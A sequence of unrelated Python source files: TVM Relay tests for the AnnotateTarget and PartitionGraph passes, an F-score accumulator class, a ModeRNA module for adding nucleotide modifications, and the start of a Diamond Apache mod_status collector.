        mod = tvm.IRModule.from_expr(f)
        return mod

    dtype = "float32"
    ishape = (1, 32, 14, 14)
    w1shape = (32, 1, 3, 3)

    def test_annotate():
        # Structural check against the hand-built expectation.
        mod = annotated(dtype, ishape, w1shape)
        mod = transform.AnnotateTarget("dnnl")(mod)
        mod = relay.transform.InferType()(mod)
        ref_mod = expected(dtype, ishape, w1shape)
        ref_mod = relay.transform.InferType()(ref_mod)
        tvm.ir.assert_structural_equal(mod, ref_mod)

    def test_run():
        # Numeric check: the partitioned module must match a plain run.
        if not tvm.get_global_func("relay.ext.dnnl", True):
            print("skip because DNNL codegen is not available")
            return
        ref_mod = annotated(dtype, ishape, w1shape)
        mod = annotated(dtype, ishape, w1shape)
        mod = transform.PartitionGraph()(mod)
        i_data = np.random.uniform(0, 1, ishape).astype(dtype)
        w1_data = np.random.uniform(0, 1, w1shape).astype(dtype)
        ref_ex = relay.create_executor("graph", mod=ref_mod, ctx=tvm.cpu())
        ref_res = ref_ex.evaluate()(i_data, w1_data)
        check_result(
            mod, {"data": i_data, "weight1": w1_data}, (1, 32, 14, 14), ref_res.asnumpy(), tol=1e-5
        )

    test_annotate()
    test_run()
@pytest.mark.skip(reason="fix constant node before opening this case")
def test_extern_dnnl_mobilenet():
    """End-to-end DNNL offload of MobileNet compared against a pure-TVM run."""
    if not tvm.get_global_func("relay.ext.dnnl", True):
        print("skip because DNNL codegen is not available")
        return

    dtype = "float32"
    ishape = (1, 3, 224, 224)
    # Bind the weights into the module so partitioning sees them as constants.
    mod, params = relay.testing.mobilenet.get_workload(batch_size=1, dtype="float32")
    mod["main"] = relay.build_module.bind_params_by_name(mod["main"], params)
    mod = transform.AnnotateTarget("dnnl")(mod)
    mod = transform.PartitionGraph()(mod)
    i_data = np.random.uniform(0, 1, ishape).astype(dtype)

    # Reference: run the unpartitioned workload on the CPU.
    ref_mod, params = relay.testing.mobilenet.get_workload(batch_size=1, dtype="float32")
    ref_ex = relay.create_executor("graph", mod=ref_mod, ctx=tvm.cpu(0))
    ref_res = ref_ex.evaluate()(i_data, **params)
    check_result(mod, {"data": i_data}, (1, 1000), ref_res.asnumpy(), tol=1e-5, params=params)
def test_multiple_ends():
    """A supported op feeding two consumers gets one compiler_end per use."""

    @tvm.ir.register_op_attr("nn.relu", "target.test")
    def relu(expr):  # pylint: disable=unused-variable
        return True

    def before():
        # relu output is consumed twice (by two abs calls).
        x = relay.var("x", shape=(10, 10))
        r = relay.nn.relu(x)
        a_1 = relay.abs(r)
        a_2 = relay.abs(r)
        out = relay.add(a_1, a_2)
        f = relay.Function([x], out)
        mod = tvm.IRModule.from_expr(f)
        return mod

    def after():
        # relu is wrapped for "test"; each consumer gets its own
        # compiler_end, and unsupported ops fall back to "default".
        x = relay.var("x", shape=(10, 10))
        cb_1 = relay.annotation.compiler_begin(x, "test")
        r = relay.nn.relu(cb_1)
        ce_1 = relay.annotation.compiler_end(r, "test")
        ce_2 = relay.annotation.compiler_end(r, "test")
        cb_2 = relay.annotation.compiler_begin(ce_1, "default")
        cb_3 = relay.annotation.compiler_begin(ce_2, "default")
        a_1 = relay.abs(cb_2)
        a_2 = relay.abs(cb_3)
        ce_3 = relay.annotation.compiler_end(a_1, "default")
        ce_4 = relay.annotation.compiler_end(a_2, "default")
        cb_4 = relay.annotation.compiler_begin(ce_3, "default")
        cb_5 = relay.annotation.compiler_begin(ce_4, "default")
        out = relay.add(cb_4, cb_5)
        ce_6 = relay.annotation.compiler_end(out, "default")
        f = relay.Function([x], ce_6)
        mod = tvm.IRModule.from_expr(f)
        return mod

    for annotate_non_call_ops in [False, True]:
        result = transform.AnnotateTarget("test", annotate_non_call_ops)(before())
        expected = transform.InferType()(after())
        assert tvm.ir.structural_equal(expected, result)
def test_type_propagation():
    """Checker functions must see checked_type on their arguments."""
    target = "test_type_propagation"

    @tvm.ir.register_op_attr("nn.relu", "target." + target)
    def relu(expr):  # pylint: disable=unused-variable
        # Raises if checked_type has not been populated by InferType.
        return expr.args[0].checked_type.dtype == "float32"

    def before():
        x = relay.var("x", shape=(10, 10))
        r = relay.nn.relu(x)
        out = relay.nn.relu(r)
        f = relay.Function([x], out)
        mod = tvm.IRModule.from_expr(f)
        return mod

    for annotate_non_call_ops in [False, True]:
        # If the type isn't propagated, then the relu checker function will fail to get the dtype.
        assert transform.AnnotateTarget(target, annotate_non_call_ops)(before())
def test_ref_create_read_write():
    """Annotate RefCreate/RefRead/RefWrite around a supported relu call."""
    target = "relu"

    @tvm.ir.register_op_attr("nn.relu", "target." + target)
    def annotate(expr):
        return True

    def before():
        ref = relay.expr.RefCreate(relay.const(1.0))
        r = relay.expr.RefWrite(ref, relay.nn.relu(relay.expr.RefRead(ref)))
        return tvm.IRModule.from_expr(r)

    def after(annotate_non_call_ops):
        # Ref ops stay on "default"; only the relu call moves to `target`.
        co = relay.const(1.0)
        if annotate_non_call_ops:
            co = relay.annotation.compiler_begin(co, "default")
        ref = relay.expr.RefCreate(co)
        ref1 = ref
        if annotate_non_call_ops:
            ref = relay.annotation.compiler_end(ref, "default")
            ref = relay.annotation.compiler_begin(ref, "default")
            ref1 = relay.annotation.compiler_end(ref1, "default")
            ref1 = relay.annotation.compiler_begin(ref1, "default")
        read = relay.expr.RefRead(ref1)
        if annotate_non_call_ops:
            read = relay.annotation.compiler_end(read, "default")
        beg = relay.annotation.compiler_begin(read, target)
        relu = relay.nn.relu(beg)
        end = relay.annotation.compiler_end(relu, target)
        if annotate_non_call_ops:
            end = relay.annotation.compiler_begin(end, "default")
        r = relay.expr.RefWrite(ref, end)
        if annotate_non_call_ops:
            r = relay.annotation.compiler_end(r, "default")
        return tvm.IRModule.from_expr(r)

    # NOTE(review): True appears twice — probably meant [True, False];
    # the third iteration just repeats the first. Confirm and simplify.
    for annotate_non_call_ops in [True, False, True]:
        result = transform.AnnotateTarget(target, annotate_non_call_ops)(before())
        expected = transform.InferType()(after(annotate_non_call_ops))
        assert tvm.ir.structural_equal(expected, result)
def test_tuple():
    target = "test_tuple"

    @tvm.ir.register_op_attr("nn.relu", "target." + target)
    def relu(expr):  # pylint: disable=unused-variable
        return True

    @tvm.ir.register_op_attr("concatenate", "target." + target)
    def concatenate(expr):  # pylint: disable=unused-variable
        return True

    """Test that TupleNode is included in annotation when surrounded by supported nodes."""
    # NOTE(review): the string above is a no-op expression statement, not
    # this function's docstring — to be one it must be the first statement.

    def before():
        x = relay.var("x", shape=(10, 5))
        y = relay.var("y", shape=(10, 5))
        a_1 = relay.nn.relu(x)
        a_2 = relay.nn.relu(y)
        out = relay.concatenate((a_1, a_2), axis=1)
        f = relay.Function([x, y], out)
        mod = tvm.IRModule.from_expr(f)
        return mod

    def after(annotate_non_call_ops):
        # With annotate_non_call_ops the Tuple itself is wrapped in
        # begin/end markers; otherwise only the calls around it are.
        x = relay.var("x", shape=(10, 5))
        y = relay.var("y", shape=(10, 5))
        cb_1 = relay.annotation.compiler_begin(x, target)
        cb_2 = relay.annotation.compiler_begin(y, target)
        a_1 = relay.nn.relu(cb_1)
        a_2 = relay.nn.relu(cb_2)
        ce_1 = relay.annotation.compiler_end(a_1, target)
        ce_2 = relay.annotation.compiler_end(a_2, target)
        if annotate_non_call_ops:
            cb_3 = relay.annotation.compiler_begin(ce_1, target)
            cb_4 = relay.annotation.compiler_begin(ce_2, target)
            tup = relay.Tuple([cb_3, cb_4])
            ce_3 = relay.annotation.compiler_end(tup, target)
        else:
            ce_3 = relay.Tuple([ce_1, ce_2])
        cb_3 = relay.annotation.compiler_begin(ce_3, target)
        out = relay.op._make.concatenate(cb_3, 1)
        ce_4 = relay.annotation.compiler_end(out, target)
        f = relay.Function([x, y], ce_4)
        mod = tvm.IRModule.from_expr(f)
        return mod

    for annotate_non_call_ops in [False, True]:
        result = transform.AnnotateTarget(target, annotate_non_call_ops)(before())
        expected = transform.InferType()(after(annotate_non_call_ops))
        assert tvm.ir.structural_equal(expected, result)
def test_composite_function():
    """A call to a Composite function is annotated as one unit."""

    def before():
        a = relay.var("a", shape=(10, 10))
        b = relay.var("b", shape=(10, 10))

        # add_relu function
        in_1 = relay.var("in_1", shape=(10, 10))
        in_2 = relay.var("in_2", shape=(10, 10))
        add_node = relay.add(in_1, in_2)
        relu_node = relay.nn.relu(add_node)
        add_relu = relay.Function([in_1, in_2], relu_node)
        add_relu = add_relu.with_attr("Composite", "test.add_relu")

        # merged function
        r = relay.Call(add_relu, [a, b])
        f = relay.Function([a, b], r)
        mod = tvm.IRModule.from_expr(f)
        return mod

    def after():
        a = relay.var("a", shape=(10, 10))
        b = relay.var("b", shape=(10, 10))

        # add_relu function
        in_1 = relay.var("in_1", shape=(10, 10))
        in_2 = relay.var("in_2", shape=(10, 10))
        add_node = relay.add(in_1, in_2)
        relu_node = relay.nn.relu(add_node)
        add_relu = relay.Function([in_1, in_2], relu_node)
        add_relu = add_relu.with_attr("Composite", "test.add_relu")

        # merged function: only the composite call gets begin/end markers.
        cb_1 = relay.annotation.compiler_begin(a, "test")
        cb_2 = relay.annotation.compiler_begin(b, "test")
        r = relay.Call(add_relu, [cb_1, cb_2])
        ce_1 = relay.annotation.compiler_end(r, "test")
        f = relay.Function([a, b], ce_1)
        mod = tvm.IRModule.from_expr(f)
        return mod

    result = transform.AnnotateTarget("test")(before())
    expected = transform.InferType()(after())
    assert tvm.ir.structural_equal(expected, result)
def test_double_target():
    """Annotating an already-annotated module is a no-op (idempotent)."""

    @tvm.ir.register_op_attr("nn.relu", "target.double.A")
    def relu(expr):  # pylint: disable=unused-variable
        return True

    def before():
        data = relay.var("x", shape=(10, 5))
        return tvm.IRModule.from_expr(relay.nn.relu(data))

    for annotate_non_call_ops in [True, False]:
        annotate = transform.AnnotateTarget("double.A", annotate_non_call_ops)
        once = annotate(before())
        twice = annotate(once)
        # A second application must not change the module.
        assert tvm.ir.structural_equal(once, twice)
def test_different_targets():
    """Annotating targets A then B sequentially equals annotating both at once."""

    @tvm.ir.register_op_attr("nn.relu", "target.different.A")
    def relu(expr):  # pylint: disable=unused-variable
        return True

    # Fixed: this checker was also named `relu`, shadowing the one above;
    # it registers the "add" op for target different.B, so name it `add`
    # (consistent with test_multiple_runs). Registration is unaffected.
    @tvm.ir.register_op_attr("add", "target.different.B")
    def add(expr):  # pylint: disable=unused-variable
        return True

    def before():
        x = relay.var("x", shape=(10, 5))
        a_1 = relay.nn.relu(x)
        b_1 = relay.add(a_1, a_1)
        mod = tvm.IRModule.from_expr(b_1)
        return mod

    for annotate_non_call_ops in [True, False]:
        mod = before()
        # Two sequential single-target passes ...
        mod1 = transform.AnnotateTarget("different.A", annotate_non_call_ops)(mod)
        mod1 = transform.AnnotateTarget("different.B", annotate_non_call_ops)(mod1)
        # ... must equal one multi-target pass.
        mod2 = transform.AnnotateTarget(["different.A", "different.B"], annotate_non_call_ops)(mod)
        assert tvm.ir.structural_equal(mod1, mod2)
def test_multiple_runs():
    """Running AnnotateTarget("A") then ("B") equals annotating ["A", "B"] once."""

    @tvm.ir.register_op_attr("nn.relu", "target.A")
    def relu(expr):  # pylint: disable=unused-variable
        return True

    @tvm.ir.register_op_attr("add", "target.B")
    def add(expr):  # pylint: disable=unused-variable
        return True

    def before():
        x = relay.var("x", shape=(10, 5))
        a_1 = relay.nn.relu(x)
        a_2 = relay.abs(a_1)
        a_3 = relay.nn.relu(a_1)
        out = relay.add(a_2, a_3)
        f = relay.Function([x], out)
        mod = tvm.IRModule.from_expr(f)
        return mod

    for annotate_non_call_ops in [True, False]:
        mod = transform.AnnotateTarget("A", annotate_non_call_ops)(before())
        mod = transform.AnnotateTarget("B", annotate_non_call_ops)(mod)
        expected = transform.AnnotateTarget(["A", "B"], annotate_non_call_ops)(before())
        assert tvm.ir.structural_equal(expected, mod)
def test_ends_with_tuple():
    """Annotation when a function body ends in a Tuple / TupleGetItem."""
    trgt = "clip"

    # Renamed from `relu` (misleading — it registers "clip").
    @tvm.ir.register_op_attr("clip", "target." + trgt)
    def clip(expr):  # pylint: disable=unused-variable
        return True

    def get_model(get_item):
        """Return a model"""
        a = relay.var("a", shape=(1, 16, 16, 4), dtype="uint8")
        z = relay.op.clip(a, 0, 255)
        b = relay.op.clip(z, 0, 15)
        c = relay.op.clip(z, 16, 31)
        t = relay.Tuple((c, b))
        tgi = relay.TupleGetItem(t, 1) if get_item else t
        foo = relay.Function([a], tgi)
        # Fixed: previously returned from_expr(tgi), leaving `foo` unused.
        # from_expr(tgi) wrapped the free var `a` into an equivalent
        # function implicitly; using `foo` makes the parameters explicit.
        return tvm.IRModule.from_expr(foo)

    def get_expected(annotate_non_call_ops, get_item):
        # Hand-built expectation: every clip is wrapped for `trgt`; the
        # Tuple/TupleGetItem markers appear only with annotate_non_call_ops.
        a_ = relay.var("a", shape=(1, 16, 16, 4), dtype="uint8")
        a = relay.annotation.compiler_begin(a_, trgt)
        z = relay.op.clip(a, 0, 255)
        z1 = relay.annotation.compiler_end(z, trgt)
        z1 = relay.annotation.compiler_begin(z1, trgt)
        b = relay.op.clip(z1, 0, 15)
        b = relay.annotation.compiler_end(b, trgt)
        b = relay.annotation.compiler_begin(b, trgt) if annotate_non_call_ops else b
        z2 = relay.annotation.compiler_end(z, trgt)
        z2 = relay.annotation.compiler_begin(z2, trgt)
        c = relay.op.clip(z2, 16, 31)
        c = relay.annotation.compiler_end(c, trgt)
        c = relay.annotation.compiler_begin(c, trgt) if annotate_non_call_ops else c
        t = relay.Tuple((c, b))
        t = relay.annotation.compiler_end(t, trgt) if annotate_non_call_ops else t
        if get_item:
            t = relay.annotation.compiler_begin(t, trgt) if annotate_non_call_ops else t
            tgi = relay.TupleGetItem(t, 1)
            tgi = relay.annotation.compiler_end(tgi, trgt) if annotate_non_call_ops else tgi
        else:
            tgi = t
        foo = relay.Function([a_], tgi)
        return tvm.IRModule.from_expr(foo)

    for get_item in [True, False]:
        for annotate_non_call_ops in [False, True]:
            mod = get_model(get_item)
            mod = transform.AnnotateTarget("clip", annotate_non_call_ops)(mod)
            expected = transform.InferType()(get_expected(annotate_non_call_ops, get_item))
            assert tvm.ir.structural_equal(expected, mod)
def test_if_else():
    target = "test_if_else"

    @tvm.ir.register_op_attr("equal", "target." + target)
    def relu(expr):  # pylint: disable=unused-variable
        return True

    @tvm.ir.register_op_attr("tanh", "target." + target)
    def tanh(expr):  # pylint: disable=unused-variable
        return True

    @tvm.ir.register_op_attr("sigmoid", "target." + target)
    def sigmoid(expr):  # pylint: disable=unused-variable
        return True

    @tvm.ir.register_op_attr("erf", "target." + target)
    def erf(expr):  # pylint: disable=unused-variable
        return True

    """Test that If-else nodes compiles correctly when surrounded by supported nodes."""
    # NOTE(review): the string above is a no-op expression, not this
    # function's docstring — it would need to be the first statement.

    def before():
        data = relay.var("data", shape=(1, 32))
        eq1 = relay.var("e1", shape=[], dtype="float32")
        eq2 = relay.var("e2", shape=[], dtype="float32")
        eq = relay.equal(eq1, eq2)
        true_branch = relay.tanh(data)
        false_branch = relay.sigmoid(data)
        ife = relay.If(eq, true_branch, false_branch)
        out = relay.erf(ife)
        func = relay.Function([data, eq1, eq2], out)
        mod = tvm.IRModule.from_expr(func)
        return mod

    def after():
        # All four ops are supported, so condition, both branches and the
        # consumer are each wrapped in begin/end markers for `target`.
        data = relay.var("data", shape=(1, 32))
        eq1 = relay.var("e1", shape=[], dtype="float32")
        eq2 = relay.var("e2", shape=[], dtype="float32")
        cb_1 = relay.annotation.compiler_begin(eq1, target)
        cb_2 = relay.annotation.compiler_begin(eq2, target)
        equality_condition = relay.equal(cb_1, cb_2)
        ce_1 = relay.annotation.compiler_end(equality_condition, target)
        # if condition
        cb_3 = relay.annotation.compiler_begin(data, target)
        true_branch = relay.tanh(cb_3)
        ce_2 = relay.annotation.compiler_end(true_branch, target)
        # else condition
        cb_4 = relay.annotation.compiler_begin(data, target)
        false_branch = relay.sigmoid(cb_4)
        ce_3 = relay.annotation.compiler_end(false_branch, target)
        if_condition = relay.If(ce_1, ce_2, ce_3)
        cb_5 = relay.annotation.compiler_begin(if_condition, target)
        erf_out = relay.erf(cb_5)
        ce_4 = relay.annotation.compiler_end(erf_out, target)
        func = relay.Function([data, eq1, eq2], ce_4)
        mod = tvm.IRModule.from_expr(func)
        return mod

    expected = transform.InferType()(after())
    for annotate_non_call_ops in [True, False]:
        result = transform.AnnotateTarget(target, annotate_non_call_ops)(before())
        assert tvm.ir.structural_equal(expected, result)
def test_while_let():
    target = "test_while_let"

    @tvm.ir.register_op_attr("less", "target." + target)
    def less(expr):  # pylint: disable=unused-variable
        return True

    @tvm.ir.register_op_attr("add", "target." + target)
    def add(expr):  # pylint: disable=unused-variable
        return True

    @tvm.ir.register_op_attr("zeros_like", "target." + target)
    def zeros_like(expr):  # pylint: disable=unused-variable
        return True

    """Test that let nodes compiles correctly when surrounded by other nodes."""
    # NOTE(review): the string above is a no-op expression, not this
    # function's docstring — it would need to be the first statement.

    def before():
        # A classic Relay while-loop encoded as a recursive Let binding.
        var1 = relay.var("var1", shape=(2,))
        var2 = relay.var("var2", shape=(), dtype="int32")
        var3 = relay.var("var3", shape=(2,))
        cond = relay.less(var2, relay.const(10, dtype="int32"))
        loop = relay.var("while_loop")
        ii = var2 + relay.const(1, dtype="int32")
        ss = var3 + var1
        true_branch = loop(ii, ss)
        ife = relay.If(cond, true_branch, var3)
        func_1 = relay.Function([var2, var3], ife)
        ret = relay.Let(loop, func_1, loop(relay.const(0, dtype="int32"), relay.zeros_like(var1)))
        func_2 = relay.Function([var1], ret)
        mod = tvm.IRModule.from_expr(func_2)
        return mod

    def after(annotate_non_call_ops):
        # Supported ops (less/add/zeros_like) get `target` markers; the
        # recursive loop call gets "default" markers only when
        # annotate_non_call_ops is set.
        var1 = relay.var("var1", shape=(2,))
        var2 = relay.var("var2", shape=(), dtype="int32")
        var3 = relay.var("var3", shape=(2,))
        var4 = relay.const(10, dtype="int32")
        cb_1 = relay.annotation.compiler_begin(var2, target)
        cb_2 = relay.annotation.compiler_begin(var4, target)
        less_condition = relay.less(cb_1, cb_2)
        ce_1 = relay.annotation.compiler_end(less_condition, target)
        loop = relay.var("while_loop")
        # if condition
        cb_3 = relay.annotation.compiler_begin(var2, target)
        cb_4 = relay.annotation.compiler_begin(relay.const(1, dtype="int32"), target)
        add_op_1 = relay.add(cb_3, cb_4)
        ce_2 = relay.annotation.compiler_end(add_op_1, target)
        cb_5 = relay.annotation.compiler_begin(ce_2, "default") if annotate_non_call_ops else ce_2
        cb_6 = relay.annotation.compiler_begin(var3, target)
        cb_7 = relay.annotation.compiler_begin(var1, target)
        add_op_2 = relay.add(cb_6, cb_7)
        ce_3 = relay.annotation.compiler_end(add_op_2, target)
        cb_8 = relay.annotation.compiler_begin(ce_3, "default") if annotate_non_call_ops else ce_3
        true_branch = loop(cb_5, cb_8)  # while loop
        ce_4 = (
            relay.annotation.compiler_end(true_branch, "default")
            if annotate_non_call_ops
            else true_branch
        )
        if_condition = relay.If(ce_1, ce_4, var3)
        const_1 = relay.const(0, dtype="int32")
        cb_9 = (
            relay.annotation.compiler_begin(const_1, "default")
            if annotate_non_call_ops
            else const_1
        )
        cb_10 = relay.annotation.compiler_begin(var1, target)
        zeros_like = relay.zeros_like(cb_10)
        ce_5 = relay.annotation.compiler_end(zeros_like, target)
        cb_11 = relay.annotation.compiler_begin(ce_5, "default") if annotate_non_call_ops else ce_5
        while_condition = loop(cb_9, cb_11)
        ce_6 = (
            relay.annotation.compiler_end(while_condition, "default")
            if annotate_non_call_ops
            else while_condition
        )
        func_1 = relay.Function([var2, var3], if_condition)
        ret = relay.Let(loop, func_1, ce_6)
        func_2 = relay.Function([var1], ret)
        mod = tvm.IRModule.from_expr(func_2)
        return mod

    for annotate_non_call_ops in [False, True]:
        result = transform.AnnotateTarget(target, annotate_non_call_ops)(before())
        expected = transform.InferType()(after(annotate_non_call_ops))
        assert tvm.ir.structural_equal(expected, result)
def test_if_free_vars():
    target = "test_if_free_vars"

    @tvm.ir.register_op_attr("equal", "target." + target)
    def equal(expr):  # pylint: disable=unused-variable
        return True

    @tvm.ir.register_op_attr("sigmoid", "target." + target)
    def sigmoid(expr):  # pylint: disable=unused-variable
        return True

    @tvm.ir.register_op_attr("erf", "target." + target)
    def erf(expr):  # pylint: disable=unused-variable
        return True

    """Test that If-else nodes compiles correctly when surrounded by free variables"""
    # NOTE(review): the string above is a no-op expression, not this
    # function's docstring — it would need to be the first statement.

    def before():
        data = relay.var("data", shape=(1, 32))
        eq1 = relay.var("e1", shape=[], dtype="float32")
        eq2 = relay.var("e2", shape=[], dtype="float32")
        eq = relay.equal(eq1, eq2)
        # zeros is NOT registered for the target, so the true branch
        # stays unannotated.
        true_branch = relay.zeros(shape=(1, 32), dtype="float32")
        false_branch = relay.sigmoid(data)
        ife = relay.If(eq, true_branch, false_branch)
        out = relay.erf(ife)
        func = relay.Function([data, eq1, eq2], out)
        mod = tvm.IRModule.from_expr(func)
        return mod

    def after():
        data = relay.var("data", shape=(1, 32))
        eq1 = relay.var("e1", shape=[], dtype="float32")
        eq2 = relay.var("e2", shape=[], dtype="float32")
        cb_1 = relay.annotation.compiler_begin(eq1, target)
        cb_2 = relay.annotation.compiler_begin(eq2, target)
        equality_condition = relay.equal(cb_1, cb_2)
        ce_1 = relay.annotation.compiler_end(equality_condition, target)
        # if condition
        true_branch = relay.zeros(shape=(1, 32), dtype="float32")
        # else condition
        cb_3 = relay.annotation.compiler_begin(data, target)
        false_branch = relay.sigmoid(cb_3)
        ce_2 = relay.annotation.compiler_end(false_branch, target)
        if_condition = relay.If(ce_1, true_branch, ce_2)
        cb_4 = relay.annotation.compiler_begin(if_condition, target)
        erf_out = relay.erf(cb_4)
        ce_3 = relay.annotation.compiler_end(erf_out, target)
        func = relay.Function([data, eq1, eq2], ce_3)
        mod = tvm.IRModule.from_expr(func)
        return mod

    for annotate_non_call_ops in [True, False]:
        result = transform.AnnotateTarget(target, annotate_non_call_ops)(before())
        expected = transform.InferType()(after())
        assert tvm.ir.structural_equal(expected, result)
def test_free_vars_zeros():
    """Test that free variables compile correctly on their own"""
    # Fixed: this text used to be a no-op string literal placed after the
    # first statement; as the first statement it is a real docstring.
    target = "test_free_vars_zeros"

    # No checker is registered for this target, so annotation should
    # leave the module structurally unchanged.
    def before():
        func = relay.Function([], relay.zeros(shape=(0), dtype="float32"))
        mod = tvm.IRModule.from_expr(func)
        return mod

    def after():
        func = relay.Function([], relay.zeros(shape=(0), dtype="float32"))
        mod = tvm.IRModule.from_expr(func)
        return mod

    result = transform.AnnotateTarget(target)(before())
    expected = transform.InferType()(after())
    assert tvm.ir.structural_equal(expected, result)
def test_empty_tuple():
    """An empty tuple should behave just like a call with no args (see above test)."""
    # Fixed: this text used to be a no-op string literal placed after the
    # first statement; as the first statement it is a real docstring.
    target = "test_empty_tuple"

    def before():
        func = relay.Function([], relay.Tuple([]))
        mod = tvm.IRModule.from_expr(func)
        return mod

    def after():
        func = relay.Function([], relay.Tuple([]))
        mod = tvm.IRModule.from_expr(func)
        return mod

    for annotate_non_call_ops in [True, False]:
        result = transform.AnnotateTarget(target, annotate_non_call_ops)(before())
        expected = transform.InferType()(after())
        assert tvm.ir.structural_equal(expected, result)
if __name__ == "__main__":
    # Run the full annotation suite when invoked as a script.
    # test_extern_dnnl_mobilenet stays disabled — see its skip marker.
    test_extern_dnnl()
    test_composite_function()
    # test_extern_dnnl_mobilenet()
    test_multiple_ends()
    test_type_propagation()
    test_tuple()
    test_multiple_runs()
    test_if_else()
    test_while_let()
    test_if_free_vars()
    test_free_vars_zeros()
    test_different_targets()
    test_double_target()
    test_ends_with_tuple()
    test_ref_create_read_write()
    test_empty_tuple()
|
"""
Copyright 2020 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
"""FScore."""
class FScore(object):
    """Bracketing F-score accumulator.

    Tracks correct / predicted / gold bracket counts and derives
    precision, recall and F1 (all on a 0-100 percentage scale).
    """

    def __init__(self, correct=0, predcount=0, goldcount=0):
        self.correct = correct  # correct brackets
        self.predcount = predcount  # total predicted brackets
        self.goldcount = goldcount  # total gold brackets

    def precision(self):
        """Percent of predicted brackets that are correct (0.0 if none predicted)."""
        if self.predcount > 0:
            return (100.0 * self.correct) / self.predcount
        else:
            return 0.0

    def recall(self):
        """Percent of gold brackets that were predicted (0.0 if no gold)."""
        if self.goldcount > 0:
            return (100.0 * self.correct) / self.goldcount
        else:
            return 0.0

    def fscore(self):
        """Harmonic mean of precision and recall (0.0 when both are zero)."""
        precision = self.precision()
        recall = self.recall()
        if (precision + recall) > 0:
            return (2 * precision * recall) / (precision + recall)
        else:
            return 0.0

    def __str__(self):
        precision = self.precision()
        recall = self.recall()
        fscore = self.fscore()
        return '(P= {:0.2f}, R= {:0.2f}, F= {:0.2f})'.format(
            precision,
            recall,
            fscore,
        )

    def __repr__(self):
        return str(self)

    def __iadd__(self, other):
        # In-place accumulation of another FScore's counts.
        self.correct += other.correct
        self.predcount += other.predcount
        self.goldcount += other.goldcount
        return self

    def __add__(self, other):
        return FScore(self.correct + other.correct,
                      self.predcount + other.predcount,
                      self.goldcount + other.goldcount)

    def __lt__(self, other):
        if isinstance(other, FScore):
            return self.fscore() < other.fscore()
        else:
            # Bug fix: previously compared the bound method `self.fscore`
            # to `other` instead of calling it (TypeError on Python 3).
            return self.fscore() < other

    def __gt__(self, other):
        if isinstance(other, FScore):
            return self.fscore() > other.fscore()
        else:
            # Bug fix: call fscore() rather than comparing the method object.
            return self.fscore() > other

    def detailed_str(self):
        """Counts plus the formatted P/R/F summary."""
        return ('(Pred= {}, Gold={}, Correct={})'.format(
            self.predcount, self.goldcount, self.correct) + '\t' + self.__str__())
|
"""
Add modifications to a residue
"""
from ResidueEditor import ResidueEditor
from BaseExchanger import BaseExchanger
from ModificationRemover import ModificationRemover
from moderna.util.Errors import AddModificationError
from moderna.util.LogFile import log
from moderna.Constants import ANY_RESIDUE, MISSING_RESIDUE, \
UNKNOWN_RESIDUE_SHORT, B_FACTOR_ADD_MODIF, \
ADDING_MODIFICATION_RULES_PATH
def parse_modification_rules(separator=' | '):
    """
    Prepares a rule for adding a modification.
    Rules describe which fragments add and how to do this
    to obtain a residue with given modification.
    Returns dict of list of dicts with rules for adding a single fragment.
    Keys in each rule dict: ['modification_name', 'original_base', 'remove',
    'moved_link_atoms', 'fixed_link_atoms', 'fragment_file_name', 'pdb_abbrev']
    """
    rules = {}
    try:
        infile = open(ADDING_MODIFICATION_RULES_PATH)
    except IOError:
        log.write_message('File does not exist: %s ' % ADDING_MODIFICATION_RULES_PATH)
        return {}
    # Fixed: the rule file was never closed; the context manager
    # guarantees closure even if a line fails to parse.
    with infile:
        for line in infile:
            fields = line.strip().split(separator)
            # Lines with fewer than 7 fields (blank lines, comments) are skipped.
            if len(fields) >= 7:
                mod_name = fields[0].strip()
                rule = {
                    'modification_name': fields[0],
                    'original_base': fields[1],
                    'remove': fields[2],
                    'moved_link_atoms': fields[3].split(','),
                    'fixed_link_atoms': fields[4].split(','),
                    'fragment_file_name': fields[5],
                    'pdb_abbrev': fields[6],
                }
                rules.setdefault(mod_name, []).append(rule)
    return rules
# Rule table is parsed once at import time and shared by all adders.
MODIFICATION_RULES = parse_modification_rules()
class ModificationAdder(ResidueEditor):
    """Adds modified-nucleotide fragments to a residue using MODIFICATION_RULES."""

    def add_modification(self, resi, modification_name):
        """
        Adds a modification to a residue.
        It adds single fragments (add_single_fragment)
        according to adding modification rules (get_modification_rules).

        Arguments:
        - modification name (as a long abbreviation)

        Raises AddModificationError for missing/any abbreviations,
        unknown rule names, or IOError during fragment addition.
        """
        try:
            if modification_name in [ANY_RESIDUE, MISSING_RESIDUE]:
                raise AddModificationError('Residue %s: expected a modification name, instead got missing/any residue abbreviation "%s"'\
                % (resi.identifier, modification_name))
            else:
                # Unknown residues are first mutated into a standard base.
                if resi.long_abbrev == UNKNOWN_RESIDUE_SHORT:
                    self.mutate_unknown_residue(resi)
                # Strip any existing modification before adding a new one.
                if resi.modified:
                    rem = ModificationRemover()
                    rem.remove_modification(resi)
                rules = MODIFICATION_RULES.get(modification_name, [])
                if not rules:
                    raise AddModificationError('Residue %s: there is no rule for adding this modification. Check modification name "%s".' \
                    %(resi.identifier, modification_name))
                else:
                    # Exchange the base first if the rule expects a
                    # different original base than the residue carries.
                    if rules[0]['original_base'] != resi.original_base:
                        bex = BaseExchanger()
                        bex.exchange_base(resi, rules[0]['original_base'])
                    for rule in rules:
                        self.add_single_fragment(resi, rule)
                    resi.change_name(modification_name)
                    self.set_bfactor(resi, B_FACTOR_ADD_MODIF)
        except IOError:
            # NOTE(review): only IOError is translated here (e.g. a missing
            # fragment file); other exceptions propagate unchanged.
            raise AddModificationError('Residue %s: could not add modification.' % resi.identifier)
def add_modification(resi, long_abbrev):
    """Adds modification with given abbreviation"""
    # Remember the pre-modification name so the log shows the transition.
    previous_name = resi.long_abbrev
    ModificationAdder().add_modification(resi, long_abbrev)
    log.write_message('Residue %s: modification added (%s ---> %s).' %(resi.identifier, previous_name, long_abbrev))
|
# coding=utf-8
"""
Collect stats from Apache HTTPD server using mod_status
#### Dependencies
* mod_status
* httplib
* urlparse
"""
import re
import httplib
import urlparse
import diamond.collector
class HttpdCollector(diamond.collector.Collector):
    """Collects worker and throughput metrics from Apache mod_status
    ``?auto`` endpoints and publishes them through Diamond."""

    def __init__(self, *args, **kwargs):
